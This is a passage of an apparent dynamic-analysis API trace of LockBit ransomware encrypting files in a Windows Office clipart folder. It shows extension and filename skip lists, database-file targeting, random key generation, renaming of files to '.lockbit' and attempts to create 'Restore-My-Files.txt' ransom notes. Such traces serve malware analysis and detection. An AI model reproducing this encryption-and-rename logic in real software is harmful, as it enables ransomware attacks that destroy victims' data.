Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.068] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.068] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.070] free (_Block=0x1fa2ed8) [0163.070] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.070] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.070] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa55a300, ftCreationTime.dwHighDateTime=0x1bd4bfc, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa55a300, ftLastWriteTime.dwHighDateTime=0x1bd4bfc, nFileSizeHigh=0x0, nFileSizeLow=0xdb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01866_.WMF", cAlternateFileName="")) returned 1 [0163.070] lstrcmpiW (lpString1=".", lpString2="NA01866_.WMF") returned -1 [0163.070] lstrcmpiW (lpString1="..", lpString2="NA01866_.WMF") returned -1 [0163.070] PathFindExtensionW (pszPath="NA01866_.WMF") returned=".WMF" [0163.070] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.070] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.071] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.072] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.072] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01866_.WMF") returned 1 [0163.073] lstrcmpiW (lpString1="ntldr", lpString2="NA01866_.WMF") returned 1 [0163.073] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01866_.WMF") returned 1 [0163.073] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01866_.WMF") returned -1 [0163.073] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01866_.WMF") returned -1 [0163.073] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01866_.WMF") returned 1 [0163.073] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01866_.WMF") returned -1 [0163.073] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.073] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF") returned=".WMF" [0163.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.073] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.073] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.074] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.074] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF.lockbit") returned 72 [0163.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01866_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0163.076] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.076] malloc (_Size=0x40068) returned 0x3e70008 [0163.076] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3512) returned 1 [0163.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0163.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0163.077] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0163.083] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.083] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.083] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.084] free (_Block=0x1fa2ed8) [0163.084] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01866_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.084] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.085] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x27e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02009_.WMF", cAlternateFileName="")) returned 1 [0163.085] lstrcmpiW (lpString1=".", lpString2="NA02009_.WMF") returned -1 [0163.085] lstrcmpiW (lpString1="..", lpString2="NA02009_.WMF") returned -1 [0163.085] PathFindExtensionW (pszPath="NA02009_.WMF") returned=".WMF" [0163.085] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.085] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.086] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.086] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.087] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02009_.WMF") returned 1 [0163.087] lstrcmpiW (lpString1="ntldr", lpString2="NA02009_.WMF") returned 1 [0163.087] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02009_.WMF") returned 1 [0163.087] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02009_.WMF") returned -1 [0163.087] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02009_.WMF") returned -1 [0163.087] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02009_.WMF") returned 1 [0163.087] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02009_.WMF") returned -1 [0163.087] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.087] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF") returned=".WMF" [0163.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.088] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.088] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.089] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.089] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF.lockbit") returned 72 [0163.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02009_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0163.090] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.090] malloc (_Size=0x40068) returned 0x3df0008 [0163.091] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10208) returned 1 [0163.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.092] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0163.096] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.096] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.096] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.098] free (_Block=0x1fa2ed8) [0163.098] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02009_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.098] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.098] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x620ded00, ftCreationTime.dwHighDateTime=0x1bd4c01, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x620ded00, ftLastWriteTime.dwHighDateTime=0x1bd4c01, nFileSizeHigh=0x0, nFileSizeLow=0x918, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02041_.WMF", cAlternateFileName="")) returned 1 [0163.098] lstrcmpiW (lpString1=".", lpString2="NA02041_.WMF") returned -1 [0163.098] lstrcmpiW (lpString1="..", lpString2="NA02041_.WMF") returned -1 [0163.098] PathFindExtensionW (pszPath="NA02041_.WMF") returned=".WMF" [0163.098] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.098] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.099] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.099] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02041_.WMF") returned 1 [0163.100] lstrcmpiW (lpString1="ntldr", lpString2="NA02041_.WMF") returned 1 [0163.100] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02041_.WMF") returned 1 [0163.100] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02041_.WMF") returned -1 [0163.100] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02041_.WMF") returned -1 [0163.100] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02041_.WMF") returned 1 [0163.100] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02041_.WMF") returned -1 [0163.100] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.100] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft 